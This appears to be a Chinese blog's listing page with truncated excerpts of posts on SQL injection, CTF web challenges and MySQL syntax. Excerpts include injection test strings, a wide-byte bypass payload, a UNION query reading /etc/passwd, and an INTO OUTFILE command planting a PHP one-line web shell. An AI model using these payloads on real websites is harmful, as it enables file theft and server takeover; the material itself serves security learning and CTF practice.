【CTFweb】简单的注入

10月22日

  题目环境:这个题目看起来好简单! 通过观察URL,发现可能存在注入点,通过使用and 1=1 ,and 1=2判断存在注入点。         一:注入...

深入浅出SQL注入

03月26日

1.判断有无注入点 数字型:and 1=1 and 1=2 和 ‘ 字符型:’and ‘1’=’1? ‘and ‘1’=’2 搜索型:关键字%’ and 1=1 and ‘%’=’%??? 关键字%’ and 1=2 and ‘%’=’% 大部分数...

SQL注入-详细攻略

03月25日

‘ //单引号报错,转义 %bf%5c%27 //宽字节注入,数据库编码为GBK时,%bf%5c认为是一个字节,绕过PHP正则 UNION ALL SELECT LOAD_FILE(‘/etc/passwd’)– //读取系统...

MySQL-SQL语法总结

03月24日

1、建表格: create table table_name( column1 datatype [not null] [not null primary key], column2 datatype [not null], …); 说明: datatype –是资料的格式,...

MYSQL-简单的一句话木马

03月24日

  通过MySQL命令,INTO OUTFILE 执行导出数据,生成一句话木马在服务端,命令如下: 第一种: select ‘<?php @eval($_POST[pass]);?>’INTO ...

MySQL盲注-时间延迟

03月20日

sqlmap支持使用–Techniques “T”指定时间延迟注入,节省sqlmap使用其他注入测试时间, 然后就是伪静态指定位置注入,在注入参数中加*(不能去掉参数值),如果有token...

loading